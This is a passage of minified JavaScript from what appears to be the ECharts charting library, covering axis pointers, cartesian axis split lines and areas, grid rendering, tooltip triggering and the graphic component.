a=e.getModel("axisPointer"),s={};E(["type","snap","lineStyle","shadowStyle","label","animation","animationDurationUpdate","animationEasingUpdate","z"],function(t){s[t]=C(a.get(t))}),s.snap="category"!==t.type&&!!o,"cross"===a.get("type")&&(s.type="line");var l=s.label||(s.label={});if(null==l.show&&(l.show=!1),"cross"===r){var u=a.get(["label","show"]);if(l.show=null==u||u,!o){var c=s.lineStyle=a.get("crossStyle");c&&L(l,c.textStyle)}}return t.model.getModel("axisPointer",new td(s,n,i))}(c,u,r,e,i,s):h;var d=h.get("snap"),f=h.get("triggerEmphasis"),g=LI(c.model),v=s||d||"category"===c.type,y=t.axesInfo[g]={key:g,axis:c,coordSys:n,axisPointerModel:h,triggerTooltip:s,triggerEmphasis:f,involveSeries:v,snap:d,useHandle:PI(h),seriesModels:[],linkGroup:null};l[g]=y,t.seriesInvolved=t.seriesInvolved||v;var m=function(t,e){for(var n=e.model,i=e.dim,r=0;r<t.length;r++){var o=t[r]||{};if(DI(o[i+"AxisId"],n.id)||DI(o[i+"AxisIndex"],n.componentIndex)||DI(o[i+"AxisName"],n.name))return r}}(o,c);if(null!=m){var _=a[m]||(a[m]={axesInfo:{}});_.axesInfo[g]=y,_.mapper=o[m].mapper,y.linkGroup=_}}}})}(n,t,e),n.seriesInvolved&&function(t,e){e.eachSeries(function(e){var n=e.coordinateSystem,i=e.get(["tooltip","trigger"],!0),r=e.get(["tooltip","show"],!0);n&&n.model&&"none"!==i&&!1!==i&&"item"!==i&&!1!==r&&!1!==e.get(["axisPointer","show"],!0)&&E(t.coordSysAxesInfo[LI(n.model)],function(t){var i=t.axis;n.getAxis(i.dim)===i&&(t.seriesModels.push(e),null==t.seriesDataCount&&(t.seriesDataCount=0),t.seriesDataCount+=e.getData().count())})})}(n,t),n}function DI(t,e){return"all"===t||Y(t)&&R(t,e)>=0||t===e}function AI(t){var e=(t.ecModel.getComponent("axisPointer")||{}).coordSysAxesInfo;return e&&e.axesInfo[LI(t)]}function PI(t){return!!t.get(["handle","show"])}function LI(t){return t.type+"||"+t.id}var OI={},RI=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.render=function(e,n,i,r){this.axisPointerClass&&function(t){var e=AI(t);if(e){var n=e.axisPointerModel,i=e.axis.scale,r=n.option,o=n.get("status"),a=n.get("value");null!=a&&(a=i.parse(a));var s=PI(n);null==o&&(r.status=s?"show":"hide");var l=i.getExtent();(null==a||a>l[1])&&(a=l[1]),a<l[0]&&(a=l[0]),r.value=a,s&&(r.status=e.axis.scale.isBlank()?"hide":"show")}}(e),t.prototype.render.apply(this,arguments),this._doUpdateAxisPointerClass(e,i,!0)},e.prototype.updateAxisPointer=function(t,e,n,i){this._doUpdateAxisPointerClass(t,n,!1)},e.prototype.remove=function(t,e){var n=this._axisPointer;n&&n.remove(e)},e.prototype.dispose=function(e,n){this._disposeAxisPointer(n),t.prototype.dispose.apply(this,arguments)},e.prototype._doUpdateAxisPointerClass=function(t,n,i){var r=e.getAxisPointerClass(this.axisPointerClass);if(r){var o=function(t){var e=AI(t);return e&&e.axisPointerModel}(t);o?(this._axisPointer||(this._axisPointer=new r)).render(t,o,n,i):this._disposeAxisPointer(n)}},e.prototype._disposeAxisPointer=function(t){this._axisPointer&&this._axisPointer.dispose(t),this._axisPointer=null},e.registerAxisPointerClass=function(t,e){OI[t]=e},e.getAxisPointerClass=function(t){return t&&OI[t]},e.type="axis",e}(ay),NI=Ta();var BI=["splitArea","splitLine","minorSplitLine","breakArea"],zI=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n.axisPointerClass="CartesianAxisPointer",n}return n(e,t),e.prototype.render=function(e,n,i,r){this.group.removeAll();var o=this._axisGroup;(this._axisGroup=new ho,this.group.add(this._axisGroup),ew(e))&&(this._axisGroup.add(e.axis.axisBuilder.group),E(BI,function(t){e.get([t,"show"])&&EI[t](this,this._axisGroup,e,e.getCoordSysModel(),i)},this),r&&"changeAxisOrder"===r.type&&r.isInitSort||lp(o,this._axisGroup,e),t.prototype.render.call(this,e,n,i,r))},e.prototype.remove=function(){NI(this).splitAreaColors=null},e.type="cartesianAxis",e}(RI),EI={splitLine:function(t,e,n,i,r){var o=n.axis;if(!o.scale.isBlank()){var a=n.getModel("splitLine"),s=a.getModel("lineStyle"),l=s.get("color"),u=!1!==a.get("showMinLine"),c=!1!==a.get("showMaxLine");l=Y(l)?l:[l];for(var h=i.coordinateSystem.getRect(),p=o.isHorizontal(),d=0,f=o.getTicksCoords({tickModel:a,breakTicks:"none",pruneByBreak:"preserve_extent_bound"}),g=[],v=[],y=s.getLineStyle(),m=0;m<f.length;m++){var _=o.toGlobalCoord(f[m].coord);if((0!==m||u)&&(m!==f.length-1||c)){var x=f[m].tickValue;p?(g[0]=_,g[1]=h.y,v[0]=_,v[1]=h.y+h.height):(g[0]=h.x,g[1]=_,v[0]=h.x+h.width,v[1]=_);var b=d++%l.length,w=new hh({anid:null!=x?"line_"+x:null,autoBatch:!0,shape:{x1:g[0],y1:g[1],x2:v[0],y2:v[1]},style:L({stroke:l[b]},y),silent:!0});np(w.shape,y.lineWidth),e.add(w)}}}},minorSplitLine:function(t,e,n,i,r){var o=n.axis,a=n.getModel("minorSplitLine").getModel("lineStyle"),s=i.coordinateSystem.getRect(),l=o.isHorizontal(),u=o.getMinorTicksCoords();if(u.length)for(var c=[],h=[],p=a.getLineStyle(),d=0;d<u.length;d++)for(var f=0;f<u[d].length;f++){var g=o.toGlobalCoord(u[d][f].coord);l?(c[0]=g,c[1]=s.y,h[0]=g,h[1]=s.y+s.height):(c[0]=s.x,c[1]=g,h[0]=s.x+s.width,h[1]=g);var v=new hh({anid:"minor_line_"+u[d][f].tickValue,autoBatch:!0,shape:{x1:c[0],y1:c[1],x2:h[0],y2:h[1]},style:p,silent:!0});np(v.shape,p.lineWidth),e.add(v)}},splitArea:function(t,e,n,i,r){!function(t,e,n,i){var r=n.axis;if(!r.scale.isBlank()){var o=n.getModel("splitArea"),a=o.getModel("areaStyle"),s=a.get("color"),l=i.coordinateSystem.getRect(),u=r.getTicksCoords({tickModel:o,breakTicks:"none",pruneByBreak:"preserve_extent_bound"});if(u.length){var c=s.length,h=NI(t).splitAreaColors,p=mt(),d=0;if(h)for(var f=0;f<u.length;f++){var g=h.get(u[f].tickValue);if(null!=g){d=(g+(c-1)*f)%c;break}}var v=r.toGlobalCoord(u[0].coord),y=a.getAreaStyle();for(s=Y(s)?s:[s],f=1;f<u.length;f++){var m=r.toGlobalCoord(u[f].coord),_=void 0,x=void 0,b=void 0,w=void 0;r.isHorizontal()?(_=v,x=l.y,b=m-_,w=l.height,v=_+b):(_=l.x,x=v,b=l.width,v=x+(w=m-x));var S=u[f-1].tickValue;null!=S&&p.set(S,d),e.add(new jl({anid:null!=S?"area_"+S:null,shape:{x:_,y:x,width:b,height:w},style:L({fill:s[d]},y),autoBatch:!0,silent:!0})),d=(d+1)%c}NI(t).splitAreaColors=p}}}(t,e,n,i)},breakArea:function(t,e,n,i,r){var o=fk(),a=n.axis.scale;o&&"ordinal"!==a.type&&o.rectCoordBuildBreakAxis(e,t,n,i.coordinateSystem.getRect(),r)}},VI=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.type="xAxis",e}(zI),FI=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.type=VI.type,e}return n(e,t),e.type="yAxis",e}(zI),HI=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.type="grid",e}return n(e,t),e.prototype.render=function(t,e){this.group.removeAll(),t.get("show")&&this.group.add(new jl({shape:t.coordinateSystem.getRect(),style:L({fill:t.get("backgroundColor")},t.getItemStyle()),silent:!0,z2:-1}))},e.type="grid",e}(ay),GI={offset:0};function WI(t){t.registerComponentView(HI),t.registerComponentModel(iC),t.registerCoordinateSystem("cartesian2d",_I),pI(t,"x",sI,GI),pI(t,"y",sI,GI),t.registerComponentView(VI),t.registerComponentView(FI),t.registerPreprocessor(function(t){t.xAxis&&t.yAxis&&!t.grid&&(t.grid={})})}var UI=Ta(),ZI=C,YI=U,XI=function(){function t(){this._dragging=!1,this.animationThreshold=15}return t.prototype.render=function(t,e,n,i){var r=e.get("value"),o=e.get("status");if(this._axisModel=t,this._axisPointerModel=e,this._api=n,i||this._lastValue!==r||this._lastStatus!==o){this._lastValue=r,this._lastStatus=o;var a=this._group,s=this._handle;if(!o||"hide"===o)return a&&a.hide(),void(s&&s.hide());a&&a.show(),s&&s.show();var l={};this.makeElOption(l,r,t,e,n);var u=l.graphicKey;u!==this._lastGraphicKey&&this.clear(n),this._lastGraphicKey=u;var c=this._moveAnimation=this.determineAnimation(t,e);if(a){var h=Z(jI,e,c);this.updatePointerEl(a,l,h),this.updateLabelEl(a,l,h,e)}else a=this._group=new ho,this.createPointerEl(a,l,t,e),this.createLabelEl(a,l,t,e),n.getZr().add(a);QI(a,e,!0),this._renderHandle(r)}},t.prototype.remove=function(t){this.clear(t)},t.prototype.dispose=function(t){this.clear(t)},t.prototype.determineAnimation=function(t,e){var n=e.get("animation"),i=t.axis,r="category"===i.type,o=e.get("snap");if(!o&&!r)return!1;if("auto"===n||null==n){var a=this.animationThreshold;if(r&&xS(i).w>a)return!0;if(o){var s=AI(t).seriesDataCount,l=i.getExtent();return Math.abs(l[0]-l[1])/s>a}return!1}return!0===n},t.prototype.makeElOption=function(t,e,n,i,r){},t.prototype.createPointerEl=function(t,e,n,i){var r=e.pointer;if(r){var o=UI(t).pointerEl=new Ip[r.type](ZI(e.pointer));t.add(o)}},t.prototype.createLabelEl=function(t,e,n,i){if(e.label){var r=UI(t).labelEl=new Ql(ZI(e.label));t.add(r),KI(r,i)}},t.prototype.updatePointerEl=function(t,e,n){var i=UI(t).pointerEl;i&&e.pointer&&(i.setStyle(e.pointer.style),n(i,{shape:e.pointer.shape}))},t.prototype.updateLabelEl=function(t,e,n,i){var r=UI(t).labelEl;r&&(r.setStyle(e.label.style),n(r,{x:e.label.x,y:e.label.y}),KI(r,i))},t.prototype._renderHandle=function(t){if(!this._dragging&&this.updateHandleTransform){var e,n=this._axisPointerModel,i=this._api.getZr(),r=this._handle,o=n.getModel("handle"),a=n.get("status");if(!o.get("show")||!a||"hide"===a)return r&&i.remove(r),void(this._handle=null);this._handle||(e=!0,r=this._handle=hp(o.get("icon"),{cursor:"move",draggable:!0,onmousemove:function(t){ve(t.event)},onmousedown:YI(this._onHandleDragMove,this,0,0),drift:YI(this._onHandleDragMove,this),ondragend:YI(this._onHandleDragEnd,this)}),i.add(r)),QI(r,n,!1),r.setStyle(o.getItemStyle(null,["color","borderColor","borderWidth","opacity","shadowColor","shadowBlur","shadowOffsetX","shadowOffsetY"]));var s=o.get("size");Y(s)||(s=[s,s]),r.scaleX=s[0]/2,r.scaleY=s[1]/2,xy(this,"_doDispatchAxisPointer",o.get("throttle")||0,"fixRate"),this._moveHandleToValue(t,e)}},t.prototype._moveHandleToValue=function(t,e){jI(this._axisPointerModel,!e&&this._moveAnimation,this._handle,$I(this.getHandleTransform(t,this._axisModel,this._axisPointerModel)))},t.prototype._onHandleDragMove=function(t,e){var n=this._handle;if(n){this._dragging=!0;var i=this.updateHandleTransform($I(n),[t,e],this._axisModel,this._axisPointerModel);this._payloadInfo=i,n.stopAnimation(),n.attr($I(i)),UI(n).lastProp=null,this._doDispatchAxisPointer()}},t.prototype._doDispatchAxisPointer=function(){if(this._handle){var t=this._payloadInfo,e=this._axisModel;this._api.dispatchAction({type:"updateAxisPointer",x:t.cursorPoint[0],y:t.cursorPoint[1],tooltipOption:t.tooltipOption,axesInfo:[{axisDim:e.axis.dim,axisIndex:e.componentIndex}]})}},t.prototype._onHandleDragEnd=function(){if(this._dragging=!1,this._handle){var t=this._axisPointerModel.get("value");this._moveHandleToValue(t),this._api.dispatchAction({type:"hideTip"})}},t.prototype.clear=function(t){this._lastValue=null,this._lastStatus=null;var e=t.getZr(),n=this._group,i=this._handle;e&&n&&(this._lastGraphicKey=null,n&&e.remove(n),i&&e.remove(i),this._group=null,this._handle=null,this._payloadInfo=null),by(this,"_doDispatchAxisPointer")},t.prototype.doClear=function(){},t.prototype.buildLabel=function(t,e,n){return{x:t[n=n||0],y:t[1-n],width:e[n],height:e[1-n]}},t}();function jI(t,e,n,i){qI(UI(n).lastProp,i)||(UI(n).lastProp=i,e?Bh(n,i,t):(n.stopAnimation(),n.attr(i)))}function qI(t,e){if($(t)&&$(e)){var n=!0;return E(e,function(e,i){n=n&&qI(t[i],e)}),!!n}return t===e}function KI(t,e){t[e.get(["label","show"])?"show":"hide"]()}function $I(t){return{x:t.x||0,y:t.y||0,rotation:t.rotation||0}}function QI(t,e,n){var i=e.get("z"),r=e.get("zlevel");t&&t.traverse(function(t){"group"!==t.type&&(null!=i&&(t.z=i),null!=r&&(t.zlevel=r),t.silent=n)})}function JI(t,e,n,i,r){var o=tD(n.get("value"),e.axis,e.ecModel,n.get("seriesDataIndices"),{precision:n.get(["label","precision"]),formatter:n.get(["label","formatter"])}),a=n.getModel("label"),s=Kd(a.get("padding")||0),l=a.getFont(),u=Zr(o,l),c=r.position,h=u.width+s[1]+s[3],p=u.height+s[0]+s[2],d=r.align;"right"===d&&(c[0]-=h),"center"===d&&(c[0]-=h/2);var f=r.verticalAlign;"bottom"===f&&(c[1]-=p),"middle"===f&&(c[1]-=p/2),function(t,e,n,i){var r=i.getWidth(),o=i.getHeight();t[0]=Math.min(t[0]+e,r)-e,t[1]=Math.min(t[1]+n,o)-n,t[0]=Math.max(t[0],0),t[1]=Math.max(t[1],0)}(c,h,p,i);var g=a.get("backgroundColor");g&&"auto"!==g||(g=e.get(["axisLine","lineStyle","color"])),t.label={x:c[0],y:c[1],style:Op(a,{text:o,font:l,fill:a.getTextColor(),padding:s,backgroundColor:g}),z2:10}}function tD(t,e,n,i,r){t=e.scale.parse(t);var o=e.scale.getLabel({value:t},{precision:r.precision}),a=r.formatter;if(a){var s={value:Qb(e,{value:t}),axisDimension:e.dim,axisIndex:e.index,seriesData:[]};E(i,function(t){var e=n.getSeriesByIndex(t.seriesIndex),i=t.dataIndexInside,r=e&&e.getDataParams(i);r&&s.seriesData.push(r)}),j(a)?o=a.replace("{value}",o):X(a)&&(o=a(s))}return o}function eD(t,e,n){var i=[1,0,0,1,0,0];return ke(i,i,n.rotation),Te(i,i,n.position),op([t.dataToCoord(e),(n.labelOffset||0)+(n.labelDirection||1)*(n.labelMargin||0)],i)}var nD=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.makeElOption=function(t,e,n,i,r){var o=n.axis,a=o.grid,s=i.get("type"),l=o.getGlobalExtent(),u=iD(a,o).getOtherAxis(o).getGlobalExtent(),c=o.toGlobalCoord(o.dataToCoord(e,!0));if(s&&"none"!==s){var h=function(t){var e,n=t.get("type"),i=t.getModel(n+"Style");return"line"===n?(e=i.getLineStyle()).fill=null:"shadow"===n&&((e=i.getAreaStyle()).stroke=null),e}(i),p=rD[s](o,c,l,u,i.get("seriesDataIndices"),i.ecModel);p.style=h,t.graphicKey=p.type,t.pointer=p}!function(t,e,n,i,r,o){var a=Rk.innerTextLayout(n.rotation,0,n.labelDirection);n.labelMargin=r.get(["label","margin"]),JI(e,i,r,o,{position:eD(i.axis,t,n),align:a.textAlign,verticalAlign:a.textVerticalAlign})}(e,t,Yk(a.getRect(),n),n,i,r)},e.prototype.getHandleTransform=function(t,e,n){var i=Yk(e.axis.grid.getRect(),e,{labelInside:!1});i.labelMargin=n.get(["handle","margin"]);var r=eD(e.axis,t,i);return{x:r[0],y:r[1],rotation:i.rotation+(i.labelDirection<0?Math.PI:0)}},e.prototype.updateHandleTransform=function(t,e,n,i){var r=n.axis,o=r.grid,a=r.getGlobalExtent(!0),s=iD(o,r).getOtherAxis(r).getGlobalExtent(),l="x"===r.dim?0:1,u=[t.x,t.y];u[l]+=e[l],u[l]=So(a[1],u[l]),u[l]=Mo(a[0],u[l]);var c=(s[1]+s[0])/2,h=[c,c];h[l]=u[l];return{x:u[0],y:u[1],rotation:t.rotation,cursorPoint:h,tooltipOption:[{verticalAlign:"middle"},{align:"center"}][l]}},e}(XI);function iD(t,e){var n={};return n[e.dim+"AxisIndex"]=e.index,t.getCartesian(n)}var rD={line:function(t,e,n,i){var r,o,a;return{type:"Line",subPixelOptimize:!0,shape:(r=[e,i[0]],o=[e,i[1]],a=oD(t),{x1:r[a=a||0],y1:r[1-a],x2:o[a],y2:o[1-a]})}},shadow:function(t,e,n,i,r,o){var a,s,l,u=function(t,e,n){return xS(t,{fromStat:{sers:V(e,function(t){return n.getSeriesByIndex(t.seriesIndex)})},min:1}).w}(t,r,o),c=i[1]-i[0],h=function(t,e,n){return[Mo(So(e[0],e[1]),t-n/2),So(t+n/2,Mo(e[0],e[1]))]}(e,n,u),p=h[0],d=h[1];return{type:"Rect",shape:(a=[p,i[0]],s=[d-p,c],l=oD(t),{x:a[l=l||0],y:a[1-l],width:s[l],height:s[1-l]})}}};function oD(t){return"x"===t.dim?0:1}var aD=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.type="axisPointer",e.defaultOption={show:"auto",z:50,type:"line",snap:!1,triggerTooltip:!0,triggerEmphasis:!0,value:null,status:null,link:[],animation:null,animationDurationUpdate:200,lineStyle:{color:Cf.color.border,width:1,type:"dashed"},shadowStyle:{color:Cf.color.shadowTint},label:{show:!0,formatter:null,precision:"auto",margin:3,color:Cf.color.neutral00,padding:[5,7,5,7],backgroundColor:Cf.color.accent60,borderColor:null,borderWidth:0,borderRadius:3},handle:{show:!1,icon:"M10.7,11.9v-1.3H9.3v1.3c-4.9,0.3-8.8,4.4-8.8,9.4c0,5,3.9,9.1,8.8,9.4h1.3c4.9-0.3,8.8-4.4,8.8-9.4C19.5,16.3,15.6,12.2,10.7,11.9z M13.3,24.4H6.7v-1.2h6.6z M13.3,22H6.7v-1.2h6.6z M13.3,19.6H6.7v-1.2h6.6z",size:45,margin:50,color:Cf.color.accent40,throttle:40}},e}(kf),sD=Ta(),lD=E;function uD(t,e,n){if(!r.node){var i=e.getZr();sD(i).records||(sD(i).records={}),function(t,e){if(sD(t).initialized)return;function n(n,i){t.on(n,function(n){var r=function(t){var e={showTip:[],hideTip:[]},n=function(i){var r=e[i.type];r?r.push(i):(i.dispatchAction=n,t.dispatchAction(i))};return{dispatchAction:n,pendings:e}}(e);lD(sD(t).records,function(t){t&&i(t,n,r.dispatchAction)}),function(t,e){var n,i=t.showTip.length,r=t.hideTip.length;i?n=t.showTip[i-1]:r&&(n=t.hideTip[r-1]);n&&(n.dispatchAction=null,e.dispatchAction(n))}(r.pendings,e)})}sD(t).initialized=!0,n("click",Z(hD,"click")),n("mousemove",Z(hD,"mousemove")),n("mousewheel",Z(hD,"mousewheel")),n("globalout",cD)}(i,e),(sD(i).records[t]||(sD(i).records[t]={})).handler=n}}function cD(t,e,n){t.handler("leave",null,n)}function hD(t,e,n,i){e.handler(t,n,i)}function pD(t,e){if(!r.node){var n=e.getZr();(sD(n).records||{})[t]&&(sD(n).records[t]=null)}}var dD=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.render=function(t,e,n){var i=e.getComponent("tooltip"),r=t.get("triggerOn")||i&&i.get("triggerOn")||"mousemove|click|mousewheel";uD("axisPointer",n,function(t,e,n){"none"!==r&&("leave"===t||r.indexOf(t)>=0)&&n({type:"updateAxisPointer",currTrigger:t,x:e&&e.offsetX,y:e&&e.offsetY})})},e.prototype.remove=function(t,e){pD("axisPointer",e)},e.prototype.dispose=function(t,e){pD("axisPointer",e)},e.type="axisPointer",e}(ay);function fD(t,e){var n,i=[],r=t.seriesIndex;if(null==r||!(n=e.getSeriesByIndex(r)))return{point:[]};var o=n.getData(),a=Ma(o,t);if(null==a||a<0||Y(a))return{point:[]};var s=o.getItemGraphicEl(a),l=n.coordinateSystem;if(n.getTooltipPosition)i=n.getTooltipPosition(a)||[];else if(l&&l.dataToPoint)if(t.isStacked){var u=l.getBaseAxis(),c=l.getOtherAxis(u).dim,h=u.dim,p="x"===c||"radius"===c?1:0,d=o.mapDimension(h),f=[];f[p]=o.get(d,a),f[1-p]=o.get(o.getCalculationInfo("stackResultDimension"),a),i=l.dataToPoint(f)||[]}else i=l.dataToPoint(o.getValues(V(l.dimensions,function(t){return o.mapDimension(t)}),a))||[];else if(s){var g=s.getBoundingRect().clone();g.applyTransform(s.transform),i=[g.x+g.width/2,g.y+g.height/2]}return{point:i,el:s}}var gD=Ta();function vD(t,e,n){var i=t.currTrigger,r=[t.x,t.y],o=t,a=t.dispatchAction||U(n.dispatchAction,n),s=e.getComponent("axisPointer").coordSysAxesInfo;if(s){bD(r)&&(r=fD({seriesIndex:o.seriesIndex,dataIndex:o.dataIndex},e).point);var l=bD(r),u=o.axesInfo,c=s.axesInfo,h="leave"===i||bD(r),p={},d={},f={list:[],map:{}},g={showPointer:Z(mD,d),showTooltip:Z(_D,f)};E(s.coordSysMap,function(t,e){var n=l||t.containPoint(r);E(s.coordSysAxesInfo[e],function(t,e){var i=t.axis,o=function(t,e){for(var n=0;n<(t||[]).length;n++){var i=t[n];if(e.axis.dim===i.axisDim&&e.axis.model.componentIndex===i.axisIndex)return i}}(u,t);if(!h&&n&&(!u||o)){var a=o&&o.value;null!=a||l||(a=i.pointToData(r)),null!=a&&yD(t,a,g,!1,p)}})});var v={};return E(c,function(t,e){var n=t.linkGroup;n&&!d[e]&&E(n.axesInfo,function(e,i){var r=d[i];if(e!==t&&r){var o=r.value;n.mapper&&(o=t.axis.scale.parse(n.mapper(o,xD(e),xD(t)))),v[t.key]=o}})}),E(v,function(t,e){yD(c[e],t,g,!0,p)}),function(t,e,n){var i=n.axesInfo=[];E(e,function(e,n){var r=e.axisPointerModel.option,o=t[n];o?(!e.useHandle&&(r.status="show"),r.value=o.value,r.seriesDataIndices=(o.payloadBatch||[]).slice()):!e.useHandle&&(r.status="hide"),"show"===r.status&&i.push({axisDim:e.axis.dim,axisIndex:e.axis.model.componentIndex,value:r.value})})}(d,c,p),function(t,e,n,i){if(bD(e)||!t.list.length)return void i({type:"hideTip"});var r=((t.list[0].dataByAxis[0]||{}).seriesDataIndices||[])[0]||{};i({type:"showTip",escapeConnect:!0,x:e[0],y:e[1],tooltipOption:n.tooltipOption,position:n.position,dataIndexInside:r.dataIndexInside,dataIndex:r.dataIndex,seriesIndex:r.seriesIndex,dataByCoordSys:t.list})}(f,r,t,a),function(t,e,n){var i=n.getZr(),r="axisPointerLastHighlights",o=gD(i)[r]||{},a=gD(i)[r]={};E(t,function(t,e){var n=t.axisPointerModel.option;"show"===n.status&&t.triggerEmphasis&&E(n.seriesDataIndices,function(t){a[t.seriesIndex+"|"+t.dataIndex]=t})});var s=[],l=[];function u(t){return{seriesIndex:t.seriesIndex,dataIndex:t.dataIndex}}E(o,function(t,e){!a[e]&&l.push(u(t))}),E(a,function(t,e){!o[e]&&s.push(u(t))}),l.length&&n.dispatchAction({type:"downplay",escapeConnect:!0,notBlur:!0,batch:l}),s.length&&n.dispatchAction({type:"highlight",escapeConnect:!0,notBlur:!0,batch:s})}(c,0,n),p}}function yD(t,e,n,i,r){var o=t.axis;if(!o.scale.isBlank()&&o.containData(e))if(t.involveSeries){var a=function(t,e){var n=e.axis,i=n.dim,r=t,o=[],a=Number.MAX_VALUE,s=-1;return E(e.seriesModels,function(e,l){var u,c,h=e.getData().mapDimensionsAll(i);if(e.getAxisTooltipData){var p=e.getAxisTooltipData(h,t,n);c=p.dataIndices,u=p.nestestValue}else{if(!(c=e.indicesOfNearest(i,h[0],t,"category"===n.type?.5:null)).length)return;u=e.getData().get(h[0],c[0])}if(ia(u)){var d=t-u,f=Math.abs(d);f<=a&&((f<a||d>=0&&s<0)&&(a=f,s=d,r=u,o.length=0),E(c,function(t){o.push({seriesIndex:e.seriesIndex,dataIndexInside:t,dataIndex:e.getData().getRawIndex(t)})}))}}),{payloadBatch:o,snapToValue:r}}(e,t),s=a.payloadBatch,l=a.snapToValue;s[0]&&null==r.seriesIndex&&A(r,s[0]),!i&&t.snap&&o.containData(l)&&null!=l&&(e=l),n.showPointer(t,e,s),n.showTooltip(t,a,l)}else n.showPointer(t,e)}function mD(t,e,n,i){t[e.key]={value:n,payloadBatch:i}}function _D(t,e,n,i){var r=n.payloadBatch,o=e.axis,a=o.model,s=e.axisPointerModel;if(e.triggerTooltip&&r.length){var l=e.coordSys.model,u=LI(l),c=t.map[u];c||(c=t.map[u]={coordSysId:l.id,coordSysIndex:l.componentIndex,coordSysType:l.type,coordSysMainType:l.mainType,dataByAxis:[]},t.list.push(c)),c.dataByAxis.push({axisDim:o.dim,axisIndex:a.componentIndex,axisType:a.type,axisId:a.id,value:i,valueLabelOpt:{precision:s.get(["label","precision"]),formatter:s.get(["label","formatter"])},seriesDataIndices:r.slice()})}}function xD(t){var e=t.axis.model,n={},i=n.axisDim=t.axis.dim;return n.axisIndex=n[i+"AxisIndex"]=e.componentIndex,n.axisName=n[i+"AxisName"]=e.name,n.axisId=n[i+"AxisId"]=e.id,n}function bD(t){return!t||null==t[0]||isNaN(t[0])||null==t[1]||isNaN(t[1])}function wD(t){RI.registerAxisPointerClass("CartesianAxisPointer",nD),t.registerComponentModel(aD),t.registerComponentView(dD),t.registerPreprocessor(function(t){if(t){(!t.axisPointer||0===t.axisPointer.length)&&(t.axisPointer={});var e=t.axisPointer.link;e&&!Y(e)&&(t.axisPointer.link=[e])}}),t.registerProcessor(t.PRIORITY.PROCESSOR.STATISTIC,{overallReset:function(t,e){t.getComponent("axisPointer").coordSysAxesInfo=II(t,e)}}),t.registerAction({type:"updateAxisPointer",event:"updateAxisPointer",update:":updateAxisPointer"},vD)}function SD(t,e){var n;return E(e,function(e){null!=t[e]&&"auto"!==t[e]&&(n=!0)}),n}var MD=["transition","enterFrom","leaveTo"],TD=MD.concat(["enterAnimation","updateAnimation","leaveAnimation"]);function kD(t,e,n){if(n&&(!t[n]&&e[n]&&(t[n]={}),t=t[n],e=e[n]),t&&e)for(var i=n?MD:TD,r=0;r<i.length;r++){var o=i[r];null==t[o]&&null!=e[o]&&(t[o]=e[o])}}var CD=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n.preventAutoZ=!0,n}return n(e,t),e.prototype.mergeOption=function(e,n){var i=this.option.elements;this.option.elements=null,t.prototype.mergeOption.call(this,e,n),this.option.elements=i},e.prototype.optionUpdated=function(t,e){var n=this.option,i=(e?n:t).elements,r=n.elements=e?[]:n.elements,o=[];this._flatten(i,o,null);var a=ma(r,o,"normalMerge"),s=this._elOptionsToUpdate=[];E(a,function(t,e){var n=t.newOption;n&&(s.push(n),function(t,e){var n=t.existing;if(e.id=t.keyInfo.id,!e.type&&n&&(e.type=n.type),null==e.parentId){var i=e.parentOption;i?e.parentId=i.id:n&&(e.parentId=n.parentId)}e.parentOption=null}(t,n),function(t,e,n){var i=A({},n),r=t[e],o=n.$action||"merge";"merge"===o?r?(I(r,i,!0),wf(r,i,{ignoreSize:!0}),Mf(n,r),kD(n,r),kD(n,r,"shape"),kD(n,r,"style"),kD(n,r,"extra"),n.clipPath=r.clipPath):t[e]=i:"replace"===o?t[e]=i:"remove"===o&&r&&(t[e]=null)}(r,e,n),function(t,e){if(t&&(t.hv=e.hv=[SD(e,["left","right"]),SD(e,["top","bottom"])],"group"===t.type)){var n=t,i=e;null==n.width&&(n.width=i.width=0),null==n.height&&(n.height=i.height=0)}}(r[e],n))},this),n.elements=H(r,function(t){return t&&delete t.$action,null!=t})},e.prototype._flatten=function(t,e,n){E(t,function(t){if(t){n&&(t.parentOption=n),e.push(t);var i=t.children;i&&i.length&&this._flatten(i,e,t),delete t.children}},this)},e.prototype.useElOptionsToUpdate=function(){var t=this._elOptionsToUpdate;return this._elOptionsToUpdate=null,t},e.type="graphic",e.defaultOption={elements:[]},e}(kf),ID={position:["x","y"],scale:["scaleX","scaleY"],origin:["originX","originY"]},DD=W(ID),AD=(F(zr,function(t,e){return t[e]=1,t},{}),zr.join(", "),["","style","shape","extra"]),PD=Ta();function LD(t,e,n,i,r){var o=t+"Animation",a=Rh(t,i,r)||{},s=PD(e).userDuring;return a.duration>0&&(a.during=s?U(ED,{el:e,userDuring:s}):null,a.setToFinal=!0,a.scope=t),A(a,n[o]),a}function OD(t,e,n,i){var r=(i=i||{}).dataIndex,o=i.isInit,a=i.clearStyle,s=n.isAnimationEnabled(),l=PD(t),u=e.style;l.userDuring=e.during;var c={},h={};if(function(t,e,n){for(var i=0;i<DD.length;i++){var r=DD[i],o=ID[r],a=e[r];a&&(n[o[0]]=a[0],n[o[1]]=a[1])}for(i=0;i<zr.length;i++){var s=zr[i];null!=e[s]&&(n[s]=e[s])}}(0,e,h),"compound"===t.type)for(var p=t.shape.paths,d=e.shape.paths,f=0;f<d.length;f++){FD("shape",d[f],p[f])}else FD("shape",e,h),FD("extra",e,h);if(!o&&s&&(function(t,e,n){for(var i=e.transition,r=ND(i)?zr:da(i||[]),o=0;o<r.length;o++){var a=r[o];if("style"!==a&&"shape"!==a&&"extra"!==a){var s=t[a];0,n[a]=s}}}(t,e,c),VD("shape",t,e,c),VD("extra",t,e,c),function(t,e,n,i){if(!n)return;var r,o=t.style;if(o){var a=n.transition,s=e.transition;if(a&&!ND(a)){var l=da(a);!r&&(r=i.style={});for(var u=0;u<l.length;u++){var c=o[f=l[u]];r[f]=c}}else if(t.getAnimationStyleProps&&(ND(s)||ND(a)||R(s,"style")>=0)){var 